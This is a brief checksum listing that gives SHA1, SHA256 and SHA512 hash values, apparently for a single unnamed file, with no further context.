SHA1 04055d0d63018302918e1e1d4a0a2949f500f5d1
SHA256 356061c3465ca4897bb4848fc68ab931d2eca5b37a8f8180f709417ea992622a
SHA512 cf8cd23c2b4736792439e155f06b514cef1c91b87356e929b69679366fd2e9e5d8866904788dd738ca05ce6fe8eb8e341d1d8d637ff1dde81cfe50be3567b1e5